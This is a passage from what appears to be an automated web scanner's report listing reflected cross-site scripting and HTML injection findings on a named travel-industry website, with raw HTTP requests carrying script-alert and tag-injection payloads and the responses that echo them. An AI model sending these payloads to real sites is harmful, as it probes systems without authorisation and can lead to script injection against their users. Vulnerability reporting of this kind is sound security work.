Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317618493; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.1.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:58:47 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621527; expires=Tue, 02-Oct-2012 00:58:47 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A21%3A%22%2Fsearch%2Fshow_results%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:58:48 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13360


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a>388ea328403">imagesbee01<a>388ea328403</a>
...[SNIP]...
4.372. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e99ac"><script>alert(1)</script>b1b021b465 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /home55bd4%22%3E%3Cscript%3Ealert(1)%3C/imagese99ac"><script>alert(1)</script>b1b021b465/loadingAnimation.gif HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/script%3E0ad586733cb?css=includes/local_exceptions.v.1235614021
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317618493; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.1.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:58:47 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621527; expires=Tue, 02-Oct-2012 00:58:47 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A21%3A%22%2Fsearch%2Fshow_results%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:58:47 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13524


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a href="/home/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/imagese99ac"><script>alert(1)</script>b1b021b465/loadingAnimation.gif">
...[SNIP]...
4.373. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 51627<a>37eb8e17911 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif51627<a>37eb8e17911 HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/script%3E0ad586733cb?css=includes/local_exceptions.v.1235614021
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317618493; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.1.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:59:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621545; expires=Tue, 02-Oct-2012 00:59:05 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A45%3A%22%2Fsearch%2Fshow_results19a8e293e8100512b1a679d8%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fsearch%2F19a8e29318a5d7b3a4d6d3dc%2F%22%3Bi%3A3%3Bs%3A45%3A%22%2Fsearch19a8e293c64291fec39985ba%2Fshow_results%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:59:05 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13341


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a>37eb8e17911">loadingAnimation.gif51627<a>37eb8e17911</a>
...[SNIP]...
4.374. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b0d9"><a>47d39309e95 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif4b0d9"><a>47d39309e95 HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/script%3E0ad586733cb?css=includes/local_exceptions.v.1235614021
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317618493; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.1.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:58:56 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621536; expires=Tue, 02-Oct-2012 00:58:56 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A45%3A%22%2Fsearch%2Fshow_results19a8e293e8100512b1a679d8%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fsearch%2F19a8e29318a5d7b3a4d6d3dc%2F%22%3Bi%3A3%3Bs%3A45%3A%22%2Fsearch19a8e293c64291fec39985ba%2Fshow_results%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:58:57 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13345


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a href="/home/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif4b0d9"><a>47d39309e95">
...[SNIP]...
4.375. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7968"><a>98157194752 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif?a7968"><a>98157194752=1 HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/script%3E0ad586733cb?css=includes/local_exceptions.v.1235614021
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317618493; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.1.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:58:22 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621502; expires=Tue, 02-Oct-2012 00:58:22 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:58:22 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13351


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a href="/home/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif?a7968"><a>98157194752=1">
...[SNIP]...
4.376. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5dae6<a>66c7f0639ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif?5dae6<a>66c7f0639ec=1 HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/script%3E0ad586733cb?css=includes/local_exceptions.v.1235614021
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317618493; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.1.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:58:30 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621510; expires=Tue, 02-Oct-2012 00:58:30 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:58:30 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13347


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a>66c7f0639ec=1">loadingAnimation.gif?5dae6<a>66c7f0639ec=1</a>
...[SNIP]...
4.377. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3942"><script>alert(1)</script>4c8141f84cf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3Cc3942"><script>alert(1)</script>4c8141f84cf/script%3E101846b9346/images/images/loadingAnimation.gif HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/loadingAnimation.gif
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621519; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.6.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:02:13 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621734; expires=Tue, 02-Oct-2012 01:02:14 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3Bi%3A2%3Bs%3A58%3A%22%2Fproducts_services%2Ftravel_agency%2F19a8e293e5add7d2a5f3772f%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A67%3A%22%2Fproducts_services19a8e293e7cff54d6ba4e0db%2Ftravel_agency%2Fcontracts%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 01:02:14 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14148


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a href="/home/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3Cc3942"><script>alert(1)</script>4c8141f84cf/script%3E101846b9346">
...[SNIP]...
4.378. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2a892<a>4c5fb7d26fc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C2a892<a>4c5fb7d26fc/script%3E101846b9346/images/images/loadingAnimation.gif HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/loadingAnimation.gif
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621519; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.6.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:02:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621735; expires=Tue, 02-Oct-2012 01:02:15 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3Bi%3A2%3Bs%3A58%3A%22%2Fproducts_services%2Ftravel_agency%2F19a8e293e5add7d2a5f3772f%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 01:02:15 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13882


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a>4c5fb7d26fc">home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C2a892<a>4c5fb7d26fc</a>
...[SNIP]...
4.379. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe8de"><script>alert(1)</script>2b275f81327 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346fe8de"><script>alert(1)</script>2b275f81327/images/images/loadingAnimation.gif HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/loadingAnimation.gif
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621519; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.6.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:02:34 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621754; expires=Tue, 02-Oct-2012 01:02:34 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A43%3A%22%2Fproducts_services%2Ftravel_agency%2Fcontracts%2F%22%3Bi%3A2%3Bs%3A67%3A%22%2Fproducts_services%2Ftravel_agency%2Fcontracts19a8e293c4186d9d9cfab9cf%2F%22%3Bi%3A3%3Bs%3A58%3A%22%2Fproducts_services%2Ftravel_agency%2F19a8e293e5add7d2a5f3772f%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 01:02:34 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14126


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a href="/home/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346fe8de"><script>alert(1)</script>2b275f81327/images">
...[SNIP]...
4.380. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 38a21<a>ff4ccfafe83 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b934638a21<a>ff4ccfafe83/images/images/loadingAnimation.gif HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
